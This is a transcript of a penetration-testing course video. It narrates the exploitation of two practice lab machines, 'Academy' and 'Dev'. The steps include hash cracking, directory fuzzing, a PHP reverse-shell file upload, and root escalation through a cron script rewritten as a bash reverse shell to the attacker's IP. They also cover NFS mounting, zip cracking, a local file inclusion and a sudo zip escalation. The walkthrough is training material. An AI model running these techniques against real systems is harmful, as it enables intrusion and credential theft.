do is gather as much information as possible now let's go ahead and exit out and i want to just cat out this note about txt okay so it says hello heath grimmy has set up the test website for the new academy i told him not to use the same password everywhere he will change it asap i couldn't create a user via the admin panel so instead i inserted directly into the database with the following command all right so we get um the looks like a database information here with values now it says the student reg no number is what you use for login so student reg no here you see this ties up to the first and then we see student photo and there's nothing in for the student photo we see password then we get password here student name okay pin code going on so this is pretty sensitive information if this were on a pen test which i've actually seen something similar to this i've been on pentest where i have seen open ftp servers i've seen open web directories where they had backups of their entire website on there with database passwords and everything it is uh it's realistic in a sense that you could run into something like this it would be pretty pretty bad so anyway this is coming from our friend jay delta and we're gonna go ahead and just grab this password here we've got this we've got this now the issue is this is likely not a password this is likely a hash and we can copy this and see first before we go down that route this might be a password but we can copy and let's just take a quick look we can go let me see the back out of this here um we can do something like this we can type in hash identifier like this and just hit enter okay this is built into kali linux you just go ahead and paste selection hit enter and this will tell you all the things that it thinks it is this is saying hey most likely it's an md5 hash okay so we have an md5 hash guess what we can crack that hash i'm going to go ahead and exit out of here and ctrl c and if we go to google and do a quick google search so i'll give you time to go to a go do a google search but all you have to do is say hash cat which is the tool we're going to use to crack this password crack md5 hash here we get a blog this is how to crack md5 hashes you go into that and it says hey in order to do that you need to run hash cat dash m for module and 0 with your hashes file and then a password list like rocky.txt so we haven't gotten much into hash cracking in this course and we're going to talk about a little bit we'll talk about it a lot more when we get into the actual active directory hacking because we start cracking passwords there becomes a lot more important here we're just going to play around with it a little bit so i'm going to show you this only this one time i'm going to show you this on on a linux machine this is running in a virtual machine here okay so we're running hashcat we're about to run hashcat in a virtual machine typically we do not want to do this because hashcat is going to be running off of our cpu okay it's going to be running off our cpu inside a virtual machine that's going to make it run a lot slower hash cracking runs off of gpus okay so we're running off of the our graphics card not our cpu so we want to do that so when i run hash cracking in the real world or even later in this course you're gonna see me running it on windows because that is my base operating system i will take that i'll run it off there because it's going to use my gpu it's going to use my graphics card and that's what i want so in this instance it's going to go a lot slower but because it's going to be an easy password to crack we don't have to worry about it too much but if you want to be good at cracking passwords and practice that definitely make sure you're using it on your base os regardless of what it is because it's going to crack a lot faster than running it in your virtual machine so we're going to do a hash cat actually before we do that go ahead and type in locate rockyou.txt you should have it somewhere okay you might have a charred version of it or a gzip version of it you can open that if you navigate to this folder like user share come in here to your folder like literally go into browse network or file system and go into user share et cetera you can get there if for some reason you do not have rocky.txt in the later version of cali they already have it here so i'm assuming that it's here if not if all you see is a gzip go ahead and just unzip that now what we're going to do is we're going to say actually one more thing i forgot you can go ahead and do a mouse pad or g edit or whatever you want you could do a hashes.txt copy and paste the hash it's a little small probably for your screen from what you can see here copy and paste the hash into this hashes.txt the one we got right here okay make sure it's in a file so once we've done that go ahead and run hash cat with a dash m of zero that's a module so we're going to be attacking the module of zero which correlates to md5 hashing we're going to give it the file of hashes.txt and we're going to give it a word list to run through of rocku.txt okay and i'm going to scroll up just so you can see this it's going to run it might take a minute to run it took me a couple seconds here um gets through it pretty quick rocky runs fairly fast on a vm and this one picked it up pretty quick so the password of what's coming up is student password of student not very great password weak password policy okay so we have a username we have a user id we have a password of student but we have no idea how we're going to do this okay where are we going now i can take some educated guesses here like for example they're saying hey this is for the new academy and this box is called academy and there's a good likelihood that if you were to do a forward slash academy on the webpage that maybe you find it right and we can go academy and go find it but i don't want to just show you and cheat so let's go back and we're going to walk through it we talked about directory busting with dur buster i want to show you a couple other tools that we can use and show you the pros and cons of both of them so open up a new tab make sure we're going to use two different tools so i want to show you both go ahead and use a tool called derb d-i-r-b and for durb all we have to do i do believe is just type in 192-168-138-129 and hit enter so this is going to go off of the website it's going to run on its own word list it's going to go in here and try to find stuff immediately i found php my admin the issue is with this it's just going to go in and start like going in and going into the phpmyadmin and looking for directories and it's finding all kinds of directories and this is going to take a minute so this is one way of doing it another way of doing it is using a tool called ff i don't know how you say it whatever everybody's got their own pronunciation if you do an aft install of ffuf like this you hit enter i already have it but yours should pick it up okay we're going to run the tool just like this so we're going to say ffuf once yours is installed do a dash w that is for word list and your word list should be in user share wordless and we can do durbuster that's fine this is where all the word lists are and then i just like to double tab or tab around and we're going to use the medium word list that's my my go to for most cases we could use the lowercase if we wanted to um i think either are fine okay from here i'm gonna go ahead and um we're gonna go ahead and back up and now what i'm gonna do is i'm gonna put a colon here and i'm gonna type in fuzz okay this is what we're to fuzz we're going to do a dash u and we're going to do http 192.168.138129 and we're going to say forward slash fuzz so we're telling this is hey with this word list we're going to be fuzzing with this word list we're going to fuzz this parameter right here this is exactly what we're doing okay we're going to hit enter and this is immediately going in and just doing all that we want to do it found academy right away php miami right away and this is very fast found a server status and all it's doing is looking one thread deep so it's not doing what durb is doing durb is going and saying hey i found php my admin now i'm going to go through and find every single directory inside of that in every single directory inside of those directories which can take a while this one is saying i'll find all the the first level directories if you want to go search those you can like we could type in academy fuzz there's commands in here that we can do to take this further we can limit which response statuses we want maybe we only want 200s or maybe we want 302s depending on this so maybe we don't want any 401s or 403s or 405s we only want the ones that come back as 200 guaranteed so in this case we're looking like we got a 301 from academy so there's a redirect there same with the phpmyadmin all right so with that in mind this is how you can find it found it quick this one's still going there's different strategies different tools everything else this one's pretty nice there's a lot of tools that come out for directory busting all the time latest ones are being built in rust which is interesting because rust is really fast there's ones built in go because go is really fast so you pick your poison on a directory busting tool and you just run with it so anyway we're gonna go ahead and enter in that registration number so you can go ahead and just come copy it from here and then you're going to go ahead and paste that and then the password is student for me i've changed the password in here because i've already gone through this box but you'll be brought to a change password screen so you could type in student change it if you want to you really don't have to you can come in here and start clicking through hey i want to enroll in a course enroll history my profile change password etc um so this is really what we have now the interesting thing in here is that we have this um upload photo feature so if we look at this we can come in here and say okay how do we want to attack a website what are some ways that we can get code execution we might be able to perform like lfi rfi attacks on this and pull down information or execute code maybe there's sql injection somewhere in here we can pull down and dump the database we did see a phpmyadmin maybe there's more behind this behind the scenes that we can do we can also go out and something that we didn't really look at on the first scan is we can do a version check like we didn't check on this version to see if there's a vulnerability there that would be something you can do same with the openssh same with the apache you can go and do those i'm only not showing you that because i'm saving time here but the correct methodology would definitely be to go check these as well to see if there's any vulnerabilities now there is in here a this is a online registration you can look and see if there's any way to pull down like viewing the source and see if maybe anything in here would tell you hey what cms is this what is this built off of because clearly this is a cms of some sort that they've used now with that in mind we can go back and we can kind of just look and see if we can find anything the first thing we might want to do is just come in here and do a browse and come and say okay i'm going to upload let me go to my my desktop i'm going to upload a picture of a dog you don't have to do this i just want to see if it works okay so i uploaded a picture of a dog perfect now the question here is and by the way we can see up here that php is in use so i'm going to make this a little bit bigger by the way but php is in use so it should say my-profile.php um what we want to do is we want to see if we can upload a file that is not not a dog okay like not a jpeg not a gif not a not whatever png we want to see if we can upload something that's not a photo and abuse the file upload system if they're doing no checks here and we can just upload this they are in big trouble so what we can do is we can right click and go we can view image which will tell us kind of where the the image is stored so it's stored in academy student photo forward slash and this is dog.jpg which is what i uploaded so what we can do let me refresh this what we can do is try to upload a reverse shell here and see if we can't get a connection back by viewing this let's see if we can upload something malicious now we know this is apache so we're going to upload via php so i'm going to go ahead and do that what i want to do is go out and we're going to do a quick search we're going to go to google and we're going to say php reverse shell and there is a great one out there from pentest monkey okay first hit should be up here there's other ones that you can use people have their preferences and their favorites this one is six years old and still works perfectly so all we're going to do is go raw here and copy this control a control c very quick and what i did was i went ahead and put this into a um a file here so let's go ahead and clear screen you can just do mouse pad g edit nano whatever you want um actually i might nano this just so you can see but i called this shell.php and then i pasted it in here that's all you got to do shell.php paste it in here i'm gonna scroll down a little bit you're gonna get to this little part after the comments and you're gonna see hey it says change this change this you need to put in your ip address whatever your ip address of your attacker machine is that needs to go here so if you need to open up a new tab come in here do ipa or ifconfig 192.168.138131 come back that matches what i've got one two three four in my opinion is fine you can leave it as is for this machine so control x this is fine you can hit yes save if it asks you to just hit y and enter and that will save your shell.php so we have shell.php we need a listener we're going to do a reverse shell here so one two three four on the nvlp on netcat this should not be unfamiliar to you should already be aware of this so we're gonna go here and now we've got this listening we're waiting for something to happen so we're gonna go back into this and we're going to upload this malicious file so i put this in my root folder shell.php click update come in here you can see nothing's happened let's see if it tries to execute oh it already executed so we don't even have to go to like we don't have to right click and go to that um that location it already executed that file when it loaded this page which is crazy so we have a we have a shell here which is great so if we do a who am i you can see we are the www dash data user so we are not we are not an admin on this machine we are not root we can do a pseudo-l but they rudely took away sudo we could type in which sudo and see if it's there locate sudo maybe they put it somewhere else locate not found either so they're playing a little bit of games with us just a little bit because we should be able to run and see hey what privileges do we have as sudo but it's not there that's okay though we still we're still going to be fine so what i want to do next is we land on a machine we're not a root user we need to perform privilege escalation this is where things get fun and this is where we're going to take a bunch of winding roads to get to where we're getting so what we're going to do now is we're going to use a tool called lin pease and we're going to utilize that to do some searching lin peace is a automated tool that goes out and does uh basically hunting for any sort of privilege escalation and i kind of cheated a little bit let me go to google and just type in literally l i n like linux p e a s like the food ps hit enter you'll see it here in github and uca lynnps.sh updated three days ago nice all right and this is going to go through and perform all kinds of checks to see if there are any escalation privileges or privilege escalation or paths for us with privilege escalations what i should say so you can go in here again raw control a control c and what i like to do and this is how i actually operate is i like to make dur on a transfers folder i call it transfers and i've already got one so i'm just going to cd into transfers or transfer is fine as well ls in here and linps.sh is already in here so you can nano lymphe's ish same thing just go ahead and get it into this folder and have a nice little transfer folder make sure you copy paste it put it into a file and have it ready to roll so what we're going to do is we're going to host up a web server so we're going to say python3 dash m for module and we're going to type in http server 80. okay and this is going to host up a web server in this folder we're going to go and grab this file on this machine so a good place to put a file that we want to we want to dump on this machine is we're just going to put it right into the temp folder so cd into temp print working directory we're in forward slash tmp okay so what we're gonna do now is we're going to do a w get http your attacker machine ip so i'm at 131 forward slash lin pease dot sh hit enter it should copy over you could see it coming through do a quick ls i already had limpies on here because i was running through this box earlier but i'm going to use the original nps so pretend with me we need to make it executable chmod plus x or change mode limpese.sh okay now we're going to run it dot forward slash linps.sh just like that hit enter it's going to start just flying across the screen it might take a minute to go through we're going to go through some of this but i'm going to give you the general gist of what you're looking for and the things that you want to look for in here so i'm going to take this and scroll back up to the top if yours isn't done running yet that's fine i kind of just want you to watch anyway on this one so we run it we get a nice little ninja turtle cute uh and you go through and it tells you the legend on here okay and it says hey red yellow means 95 could be a privilege escalation vector red you should look into it and then it gives you a different one so really we're looking for red and we're just trying to see if we can find anything in here that could be of interest for us now as we're scrolling through it gives us information about the um you know the linux distribution the release all that that could be useful if we have some sort of escalation against this there are different types of escalation that we could use and the release information could be important to us though it is not for this machine so we're going to skip over it for now you go through it tells you all kinds of stuff about the all the operating system what's running on it and it's looking for anything that could be of interest now it's telling you hey what do we have that we can run this just says yes this is a virtual machine keep going through keep going through this is looking at cron jobs which we'll talk about in a little bit this is looking for any sort of system d timers or cron jobs we have no cron jobs running that look relevant to us this is just running apache 2. this is running a and this actually looks like it could just be the processes running not even the cron jobs so these are just the processes running nothing of interest to us right now scrolling through here um we're just going to look and see if we find anything of interest now there is a highlighted red and yellow here with homegr we're gonna copy that bad boy see what what it is um and then from here you're gonna go ahead and just keep scrolling so we come through keep scrolling keep scrolling and a lot of this is just information that is provided with us what is of interest and for this machine now you're welcome to read through this there's a lot of data to read through i like to scroll through kind of really quick and just see if anything stands out not at this pace but um like right here look we're scrolling through and we see hey there is a mysql password of my very secure pass that is of interest to us um it looks for passwords and we're going to scroll down to the bottom i'll show you kind of what it looks like so if we scroll all the way down we start scrolling up a little bit you'll see that the my very secure pass shows up again it shows up right here and it tells you hey this is in this includes config.php file so that's really what we're looking for we've got a password up here manage students at one two three four five so we can go look at that if we wanted to um and some things in here that we we want to make note of so maybe we open up a notepad like we come into we come into a text editor we just do a paste here because the grimmies of interest we found the password of my very secure pass which maybe we want to just copy this whole thing out okay and i might put that into my little my little notes as well and maybe i want to read this this document and see what's in here as well so this is of interest we want to go through and just see anything of interest now i am skipping ahead just a little bit only because to save time for the video there will be other opportunities to learn privilege escalation and again we have the privilege escalation course if you want to go through this in more detail this is again just trying to get your feet wet introduced to the idea and understanding what we're doing here so now let's go ahead and uh let's look at the file that we just found first we'll wait on the grimmy file let's go ahead and just cap this out okay so if we cut out this config.php we see that we get a sql user of grimmy we get my very secure pass okay we get some information there so we can maybe try to see if this works for us anywhere it's a sql user database maybe we can get into the sql database and find some information that is one option though i did not see any sort of information for sql unless we could log into phpmyadmin with this on that web panel that we're looking for so that's something that could work um we also want to see if there's anything maybe we go cat etsy password see if that works for us okay so etsy password is showing us all the users on the machine of interest we like to scroll down to the bottom and we see a user of grimmy and it says groomie's an administrator which is interesting so it's pointing to grimmy being a user on this machine so it doesn't hurt to just copy this password and see what we can do with grimmy so what we can do here is i'm going to go ahead and just go to a new tab and i'm going to cat and by the way we should have known that anyway because there was a folder called home grimmy backup.sh or homegrimy so grimmy would have been an indicator anyway that that we were up against a user named grimmy so we do ssh we can do grimmy at and this machine is 192.168.138129 for me go ahead and hit enter once you got it in there and it should ask you your first time about a fingerprint just type in yes hit enter and then go ahead and paste in that password that we just got and maybe i copied it wrong so i'm gonna go copy that one more time okay and here we go so now we are in this machine um we don't have pseudo access i don't believe sudo dash l again it says sudo not found it could be that we have a broken version of bash or they intentionally removed it because it's just ctf that's one of the first checks i do history is another check though i have some history in here from myself so you might not have any history when you come in here this is just all me doing this now one thing that i do again is i like to come in and i like to download lin p's run it again see if anything's changed i'm going to skip over that process but i'm just telling you for the process what we want to do is we want to make sure we we look at the file that's of interest okay so that file when we went and saw was in the home grimmie folder so let's just go ahead and cd the home grimmy and we're going to ls in here and all we have is backup.sh let's run catbackup.sh so what we have is it looks like it's removing a temp backup file it dot zip it's zipping up a backup.zip from this var html academy includes so it looks like it's doing a backup of the academy and then it's changing the permissions of the temp file so if we look at temp there may or may not be a backup.zip sitting in there so what this is telling me is this is probably going out there and doing periodic checks or a script is running periodically to see if or to perform this backup so it could be running every hour every day every week we don't know what it's running now we can see if by chance we have access to that information when we were looking at the cron information from lin pease i didn't see it in there we could also do a cron tab dash l to c um here we have no cron tab for grimmy so what's happening possibly is that grimmy doesn't have the cron tab we can try to see if we can crontab of a user uh look at root and just do a dash list but it says you must be privileged so we have to run sudo but we don't have sudo so we won't be able to switch into route to to use that as well we don't have privileges to do that so without having any cron tab information or seeing it running when we we looked at the cron we could do a cron tab dash e as well i just don't i mean there's nothing there's nothing in here so this isn't giving us any indicator and a cron job is something that will run for us by the way uh and we tell it hey i want to run this this script every hour every minute every day every week we could tell it when when we want it to run so this is a realistic scenario in that sense that cron jobs are used in administration so from here if we don't have that there's something else called the system d timer we can look at that from system ctl and just say list timers and come through like this and see if there's any script in here running that's uh in a timer and i actually don't see anything here you can hit q for quit and that'll that'll exit this so when we have this situation there's a tool that we can use out there that will actually give us more information of what's running with the processes than what is leading on remember we ran a ps with the um we ran ps for everybody with the the script the lin p's we saw it we didn't see anything in there that was any indication of this backup.sh so if we want validation and confirmation that this is running on a timer we can go ahead and go out and there's a tool out there that is pretty neat it's called pspi pspy and all you have to do literally i have to do google this by the way just i'm gonna do it just so we could say we did it ps pie literally the first thing that comes up so in here what you want to do is go ahead and download the 64-bit static version and when you download that you might get put into your downloads folder all you have to do is we'll open a new new tab here real quick all you have to do is do a move command if you don't remember so move downloads ps pi and just put that in your transfer slash ps pi okay um ps pi 64. it's actually what it's called i'm just winging it here i've already got it in my folder but make sure you move it over to your folder or if you want to keep it in downloads and run from there that's fine as well just note that i already have this in my folder here so all you have to do now is cd over to your temp folder um if ils i've already i've got some stuff in here uh it looks like limpese backup.zip is sitting in here what i'm going to put in here is this ps pi and we're going to run it so i'm going to do a wget and remember i already have my listener for my web server running from earlier so this is just going to be a simple uh grab and go and this is ps pi 64. grab this all right ls chmod plus x on ps pi 64. and we're going to run it now what this is doing is showing us all the processes running on the machine all of them and we can scroll through this and kind of see and yours is going to look different than mine don't worry about the pid numbers don't worry about the timing don't worry about any like anything like that all you got to do is scroll through here and see if we can see that backup.sh running and we can come through see if there's anything in here and look now it showed up back up to sh i don't think that was there before so what happens is it just waits for this to run and then when it runs we're seeing it come through here so it looked like it just ran if we wanted true confirmation we could sit here and wait another minute and see if this runs because my punches is running every minute because this is captured flag box so we could do that i'm going to tell you that it is running every minute so we don't have to do that just to save a little bit of time so ctrl c get back into your grimmy at academy and now we are going to abuse this in our favor let's go ahead and go to cd home grimmy we're gonna go back make sure you have your backup.sh in there and now what we're going to do is i want you to google go to google and you go and say bash reverse shell one liner okay and there is a reverse shell cheat sheet from pen test monkey you could also type that in click on that here you will see right up front you will see bash dash i you're gonna see this right here this is a one line reverse shell this is awesome all we're gonna do is put this into a shell script uh which we already have we have it right here we're gonna put that in there and when it executes it's going to perform reverse shell so what we want to do is we want to modify this a little bit so let's go ahead and open up a notepad real quick it might be a little bit small on your screen for you but what i'm doing is i'm putting in where it says 10.0.0.1 i'm putting 192.168.138.131 which is my attacker machine and i'm going to change the ip address to 8081 or to the port to 8081. you are more than welcome to keep it at 8080. i'm just doing this because i ran through this once earlier and there's a possibility that port is still out there lingering so just for the video purpose i'm changing it to 8081. so what does that mean i have to do netcat mvlp set up that reverse shell listener and here's what's going to happen we're going to come in here and we're going to say nano backup.sh you can come in here tab down a couple times and if you hit ctrl k it deletes a line that's the magic if you didn't know it and you can come right click paste selection maybe paste clipboard okay uh and what we're going to do is this is going to execute bash dash i dev tcp 192.168. it's going to call out to our ip address with this and if our hunch is correct that this is running as the root user we're going to get a root shell on this so what's happening is this cron job is out there it's running as root it's executing as root and when it executes that script it's going to execute as a root shell which it just did you could see root at academy who am i okay so let's cd to root just for the fun of the game uh maybe cd root ls okay and then catflag.txt says congrats you rooted this box looks like this cms isn't so secure i hope you enjoyed it if you have any issues please let us know in the course discord happy hacking great that was a example of a box with a couple of pivots a couple of different privilege escalations and very gamified very capture the flag you will likely never do most of this on a pen test ever in your life but it's still important to learn from the hacking process as we build up into this and then as we get into more of the active directory stuff so that is it for this video we're gonna go ahead and call it here and i'm gonna go ahead and catch you in the next one okay on to the box dev now let me preface this with it is raining pretty bad here so if you hear thunderstorms or anything in the back consider it part of the ambiance but we're going to do another box from alec thank you alec for creating this wonderful machine and this box is a linux machine so you should already have it set up we're past the setup stage you should know how to set it up come in here i already have an mmap scan ran against it so if you do not have an map scan ran against it you should go ahead and do that pause if you need to otherwise you could just follow along so running the nmap scan we could see that we have port 22 ssh and remember what we said about ssh we're not going to look at it right now it's nothing that's at least in my experience i've ever found an exploit for so unless we have credentials or something for that we're not going to get into ssh we have something on port 80 called bolt installation air for apache web server okay that's an indicator this might be a linux machine already because we're seeing debian that's a nice indication we have rpc bind which we can enumerate rpc though it's not that advantageous for us right this instant that gets into more advanced stuff honestly as a beginner we're going to leave rpc alone though there is some information gathering that you can get out of rpc as of right now we're going to just kind of push it to the side because we've got more important things to focus on and more common things to focus on so we have 2049 nfs which is a network file share think of it like almost like smb like samba for file sharing this is a network file share we can potentially mount to a file share here so that might be of interest for us we also have http here for 8080 it just says connection apache debian php info page we've got some mount d and n lock manager we're not going to worry about any of these ports which stand out to me are 8080 2049 and 80. okay so keep those in mind as you go through these more as you get better at this it'll be easier for you to understand which ports you're looking for which ports you can kind of just throw to the side for now so with that we're going to go ahead and take a look at 80 we're going to take a look at 8080 then we'll take a look at the network file share so going out to the web page i have google open i'm just going to go 192 168 138 137 go here and i'm also going to copy this and take this out to port 8080 and you can see that we have a couple pages one is a bolt installation error page which is interesting we can come out and look at this it looks like there's something called bolt we can actually go to the real web page here and see what's running uh bolt cms so we'll keep that in mind maybe they're running bolt cms we could put that in our back pocket in our notes it looks like there's an installation error it's talking about the folder that should be installed in which these are linux folders so this is more indication that we're likely attacking a linux machine here so we can do some research on this but let's put that in our back pocket for now um other website here is on port 8080 we're getting a php info page which is nice sometimes this can disclose some information you can actually read through this and see like here's the path here's like the webmaster here's the ip address that we're pointing at so there's some different things in here that we can we can look at and possibly if we were attacking this page there could be some information disclosure in here that could tell us what the setup is of this php page and that could tell us like hey maybe there's file inclusion maybe there's uploading allowed different attacks that might be enabled because of a setting that is configured or misconfigured in this php my info type page so our php info page so we have two pages here that are i mean there's nothing really there it's it's like hey php info bolt installation error so we kind of want to look under the hood this is just common common tactic here that we're going to open up a new tab i'm going to open up two of them and we're really just going to uh enumerate this a little bit further i just want to see how how far we can take this if if it is what it is like port 80 is literally just a bolt installation error page that's fine but we need to confirm that so we're going to use uh f whatever you want to call it and we're going to do a quick scan on this and we're going to do user share wordless and then i go to dirtbuster and just like before you can just tab and i use the medium word list i put a call in i don't know how to if you know the trick of getting it to line up immediately after let me know otherwise just go delete that one space we can fuzz here and then we can do a url of http 192.168.138.137 for this machine forward slash fuzz now before you hit enter go ahead and copy this make life easier hit enter let that bad boy run come in here paste again and all we're going to do on this one is we're going to put 8080 at the end of it so we're going to fuzz against 8080 and port 80. we're gonna let these run a little bit okay so we'll let these run perhaps finish see if we can get anything of interest out here um while they're running we can multitask this is part of the the process by the way as a as an ethical hacker or hacker in general multitasking is important because you if you're on an engagement like a pen test you're going to be doing a lot of things at once because imagine a situation where you have a thousand ip addresses and you have a week to go against them if you only have a week to do a thousand ip dresses you're talking like a few minutes per ip address to look at so you really have to identify and scan for low hanging fruit figure out which ip addresses are the most advantageous go touch on those more and you know perhaps be spending a couple minutes on each at the same time while you're doing this so it's advantageous to look at multiple things have scans running and be bouncing back and forth from an ethical hacking perspective and you pick up the ability to multitask over time so anyway we have this nfs this network file share and i'm curious if there's anything there so what we can do i'm going to go ahead and just open up a new tab make this a little bit bigger what we can do is we can say show mount this is a command already built into your machine if you're familiar with linux you probably know this put an e there we're just going to list out the directory that's here the mounted file share hopefully that there's one okay and we're exporting from here this okay this is the file share that's offered up so we've got looks like server nfs network file share so what we're going to do with this is we're going to go ahead and utilize this uh from to our advantage we're going to mount and see what we can see in this share so in order to do that we need to make a directory to mount to so i'm just going to make a directory called mount mnt we have an mnt folder by default and then i'm just going to call this dev since that's the name of the machine all right and then we're going to mount this so we're going to say mount tak t nfs so this is the type it's nfs and we're going to say 192.16 and then we're going to do server nfs okay so we're calling out on this machine is this server nfs or srv nfs and then we're going to put it in mount dev just like that all right so now we can go cd into mount dev ls and you can see that there is a file in there that file is called save.zip so i'm going to go ahead and try to unzip that and it says hey we need a password to unzip this id rsa file uh i have no idea what the what the password is so it looks like there's an id rsa in here and a 2do.txt and we don't have the password for either of these now there's a possibility that we go online we look through some of these uh these folders maybe something comes back there's a password in there that's the path to go the other thing that we can do is see if we can crack this very quickly if we can crack it then maybe we can get in there and there's a tool out there called f crack zip so we can do something called like app install f crack zip just like this and i've already got it installed but you should not it doesn't come by default okay go ahead let that install should only take a second and then come back and now we're going to do f crack zip just like that yours might not auto tab you might just have to type it out that's okay uh dash v for verbose we want to have verbosity here see all the output uh dash u just means we're going to be unzipping so we're going to unzip the uh the files here and a dash capital d means we're going to be using a dictionary attack and a dash p means we're going to be using a file in order to attack so the dictionary attack we're using is the user share wordless and then we're going to use okay and on this other part for the dash p we're going to go ahead and use this save.zip so we're using a string here as the initial password file which is what we're doing if we didn't have this here it would just start attacking via the files inside so we're gonna we're calling out specifically and then here we're saying we're using a word list here's the word that we're using so i'm gonna go ahead and run that hit enter okay and you can see that we have found password is equal to java 101 so now if we go to unzip save dot zip type in java 101 hit enter okay ls they should be here now so let's cat out the to-do.txt it says figure out how to install the main website properly the config file seems correct update development website keep coding in java because it's awesome and then we get a signature from jp we don't know who jp is but we do get an id rsa file so that id rsa file can be used in order to connect via ssh now we don't know who the user is there's a chance that the user might be uh jp so we can do something like ssh-i i'm not sure if the permission settings here are going to be correct in this id rsa file we'll see here in a quick second and then we come in here we say something like jp at 192 168 138 137 cross your fingers type yes it asks for his password uh we don't we don't know a password um so we're not even sure if that's that's working we're not sure it didn't even look like it took the id rsa uh so we're not sure if this guy's even a user so let's let's keep this information in our back pocket for now we have this we're gonna clear screen we have this idrsa file and we have some information hopefully sitting here waiting for us so on the port 80 side we have a public 301 we have a source 301 we have an app 301 um vendor extensions okay so maybe we come in here and we take a look at that also on this side we have a dev directory so if we go in here and we just forward slash dev we are brought to this bolt wire application which is cool um on here we have a few different uh we have a few different directories that came back let's see we have public source app so we can kind of go through those manually just public see what's there nothing's there bolt user first it says um source site uh we get a customization extension php i don't know if there's anything in there you could open that doesn't look like it's gonna go anywhere next we go to app kind of come through here and this is where we find a directory and i think i said in one of the past videos that it's kind of realistic i have seen this actually on a pentest before where you come across a directory and this directory listing can be a finding one time i literally came in here and the first thing sitting at the top of the directory was sql database with all the passwords and information in here so looks like there's a bolt database in here though the size is zero um i clicked through here earlier trying to click around see if i could find anything cache is interesting but config would probably be more interesting especially a config.yaml file so i went ahead and just downloaded that and then i have it stored here i'm going to go ahead and just open that up and i encourage you to do the same open with mousepad open with whatever you like here you can see that it says hey the the username is bolt and the password is i love java so i'm going to copy this we don't know where this works if this works if this pays off for anything anywhere but we're going to save this information kind of in our back pocket so i'm going to do a new tab in here and just paste that because that's some information that we got so the other side of things is that we also have a bolt wire application and we can come in here and look around it looks like there's a registration page i might be able to register like uh hacker and password hacker come in here and uh it doesn't look like it's letting us do anything else so we're clicking around we got some search features uh it doesn't look like it's doing anything print can print some information on the site so it's best to click around see if there's anything of interest in here but i'm not seeing anything at this point in time of interest so as of right now i'm curious as to this bolt wire if there's anything um any vulnerabilities that exist so we can go out to google i'm actually have google open right here and we can just say like bolt wire exploit and see what comes up now there's one from 2020 uh there's one from 2012 i'm going to use the more recent one this local file inclusion we could also search this on our cali machine by the way we can go in and just do like a um let's see we can do a search split and just do bolt wire and see what comes back and you can see that all that shows up are multiple cross-site scripting which cross-site scripting is not going to have any any effect for us like putting cross-site scripting here isn't going to do anything on a box like this unless they are from a from a ctf standpoint unless there is somebody mimicking a user going in and and actually navigating the website there's no use for even attacking cross-site scripting that's not to say that this is not a great vulnerability and this is something that you you would see in the real world you absolutely do but we attack real users with this that's part of it because you store cross-site scripting or you store javascript or and you attack users that we're not attacking any users we're just attacking this box at this time so what we're going to do then is probably really focus on this local file inclusion so let's take a look at it and open this up we'll talk about local file inclusion what that is what it might be so really quickly local file inclusion allows us to potentially expose files that are running on a server and this can lead to information disclosure as you're going to see here remote code execution cross-site scripting there's a lot of things that it can do so basically what's happening is it is accepting this path here as input it's a coding error on the development side so we're able to input this and what we're doing dot dot slash dot slash imagine you're in a linux machine we're literally just saying hey i want to go back as far as possible to a base directory and then etsy password okay so this could be the as many directories as needed you could throw in 10 of these and it might work and then we're trying to get the etsy password because this will allow us to see who's on the machine running now this is running as a as a root user then guess what we can run this as etsy shadow and go grab the hash and maybe we have even more sensitive information but this attack by itself is pretty cool and is um it's not seen in the wild as much but it is definitely out there so something we test for on every web application so what we're going to do here is we're looking for local files remember this is local file inclusion so no remote files which is a different type of attack lfi here not rfi so it looks like we're using action search action and then this attack frame here so i'm going to go ahead and just copy this i'll show you why because i was looking at the application and you can see that here's the index.php p equals welcome in here it's very similar p equals action dot search so this is on the search feature it looks like it's happening or on the action parameter so we're going to go ahead and paste that in here make sure you've created an account by the way if you do not have an account created for this then it is not going to work i don't know if that says that in here that you need to be authenticated or not oh it does being authenticated so if you're not authenticated it will not work so you can come in here just come over here and paste cross your fingers and it works so one thing i want to try real quick is like etsy shadow nothing it was worth a shot you never know it so we're not running as a user that can read the etsy shadow file um so in this instance we're just looking at a user that can read the etsy password that's okay we're not a high level user here and what we can do is we scroll down to the bottom we always know roots at the top scroll down the bottom to see who your users might be and out of anything that stands out in here there's only one user and that is our friend jp who looks like his name is jean paul so i think we have a user here so this explains why the jp didn't work for us before when we tried logging in on the machine because john paul was the user that we had um and he wasn't on that machine so we were looking for john paul so now we found a little bit more information and we can tie this all together hopefully and actually exploit this machine so i'm going to go back where was the mount that i had i'm going to go back in here and try ssh-ing again with this file and do a jean paul and it's asking for a password key phrase okay so there are two options that we can do here option number one is you are capable of brute forcing this uh key id rsa john the ripper can take this and push it through the issue is if the password doesn't show up in your word list or the password is too strong for example then it's not going to work we also have some information that we found before that might work out for us we already know that john paul or jp said in his to-do that he is a lover of what java and he comes in here and we have a password saying i love java now my hunch is this probably doesn't show up in uh in rocky and we can do a quick check on that actually so let's just do a cat user share wordless rocky like this and you can just watch and then we're just going to grip on this password it doesn't show up like where if you wanted to grip on like pasta you could see all the different times pasta shows up in this in this word list so that if we were to ran rock you against this with the word list it wouldn't have worked now if we had a really good word list possibly it shows up but we already know a little bit about him we're going to go ahead and try pasting that in and of course it works jean-paul really loves java so jean-paul dev has logged in and now we are we are the low level user so do a quick ls print working directory we're in his home folder there's nothing here some things that i like to do immediately history check okay it looks like somebody cleared out the history somebody ran a pseudo dash ellen here exited um sudo dash l is the second check that i like to do or even first check like do because it tells us what we can run as sudo without a password okay so sudo remember is what we can run as elevated privileges so in this instance we can run the zip feature with with no password so we can literally run sudo zip and should work okay so it's not requiring a password awesome issue here how how can we take sudo zip and abuse that feature for us to be able to escalate into root that is the question if we have a no password which this comes up a lot in boxes like this like ctf style boxes if we have a no password how can we do this so we need to go take a look at that we come over here i got a site for you go out to the google machine okay and you're going to type in gtfo bin just like that it's really gtfo bins but we took what showed up first okay gtfo bins great website let's make it bigger great great website you come in here you can look for the different type of escalations that you want we have a pseudo escalation okay pseudoescalation and we come in here we say okay we've got sudo and then we're looking for zip we can come we can type in zip in the search bar but we also have zip right here so if we want to do a pseudo zip we go into zip look for sudo and it says here's how you use sudo as a zip in order to get a um in order to get root privileges okay and so it says in here if the binary is allowed to run as a super user by sudo it does not drop the elevated privileges and may be used to access the file system escalate or maintain privileged access it's telling us what it's doing all we have to do here is copy this come over paste this okay come back copy this this should drop us into a shell this should drop us into a shell let's see what happens all right we have been dropped into a shell here as sudo we dropped into a shell so with that if we type in id we are now root why because sudo runs elevated we said okay as elevated user we want to go ahead and drop into a shell here we did this now 